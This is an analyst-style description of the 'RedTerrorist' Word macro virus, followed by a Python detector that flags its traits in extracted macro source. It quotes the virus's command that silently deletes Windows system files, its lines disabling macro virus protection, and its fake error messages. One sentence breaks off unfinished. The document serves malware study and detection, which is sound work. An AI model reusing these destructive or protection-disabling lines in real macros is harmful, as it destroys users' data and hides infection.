This is a non-polymorphic Word virus. The virus resides in the RedTerrorist module.
It has seven subroutines: AutoOpen, AutoClose, FuckThemAll, ToolsMacro, ToolsCustomize, ViewVBCode and Delay.
The virus replicates when a document is opened or closed.
The AutoOpen and AutoClose procedures only call the main infection routine of the virus, which is in the FuckThemAll routine.
The Delay macro causes the system to pause before a message window is shown:
For i = 0 To 19170000
Next
FuckThemAll is the main virus routine. It checks the system parameter 'Country' and, if this is 'US', it then runs the command shell:
"c:command.com C echo y | del " + Environ("windir") + "system*.* > nul"
After that the virus sets the following parameters:
.SaveNormalPrompt = False
.VirusProtection = False
.AllowFastSave = True
.BackgroundSave = True
The virus checks for the presence in the active document (or normal.dot)
ToolsCustomize, ToolsMacro, ViewVBCode:
These three routines are used for stealth; when executed they call the Delay routine and display Message Boxes:
Top level process aborted, cannot continue
Configuration too large for memory
Error in EXE file, program too big to fit in memory
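
The traits described above can be checked in macro source text that has already been extracted from a document or from normal.dot. The Python below is an added example, not part of the original description: the trait labels, the grading in classify() and both sample texts are constructed here, and the samples are inert fragments rather than virus code.

```python
import re

# Traits from the description above, as case-insensitive regexes over one
# line of macro source. The labels are this example's own names.
_SUB = r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
TRAITS = {
    "auto_macro": _SUB + r"(?:AutoOpen|AutoClose)\b",
    "stealth_macro": _SUB + r"(?:ToolsMacro|ToolsCustomize|ViewVBCode)\b",
    "protection_off": r"\.VirusProtection\s*=\s*False\b",
    "normal_prompt_off": r"\.SaveNormalPrompt\s*=\s*False\b",
    "shell_delete": r"command\.com.*\|\s*del\b",
    "busy_wait": r"^\s*For\s+\w+\s*=\s*0\s+To\s+\d{7,}\b",
}
PATTERNS = {name: re.compile(rx, re.IGNORECASE) for name, rx in TRAITS.items()}

def scan_macro_source(source):
    """Return {trait: [line numbers]} for every trait found in the text."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("'"):  # skip whole-line VBA comments
            continue
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def classify(source):
    """Grade a module: a replication hook combined with hiding is the signal."""
    hits = scan_macro_source(source)
    replicates = "auto_macro" in hits
    hides = bool({"stealth_macro", "protection_off", "normal_prompt_off"} & hits.keys())
    if replicates and hides:
        return "high" if "shell_delete" in hits else "medium"
    return "low" if hits else "none"

# Constructed samples: inert fragments that only carry the traits.
SAMPLE = """\
Sub AutoOpen()
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
End Sub
Sub ToolsMacro()
    For i = 0 To 19170000
    Next
End Sub
"""
BENIGN = "' AutoOpen is not used here\nSub FormatReport()\nEnd Sub\n"

if __name__ == "__main__":
    print(classify(SAMPLE), scan_macro_source(SAMPLE))
    print(classify(BENIGN))
```

A module that defines ToolsMacro, ToolsCustomize or ViewVBCode replaces the built-in commands of the same name, which is why those definitions are graded as hiding behaviour when they appear alongside AutoOpen or AutoClose.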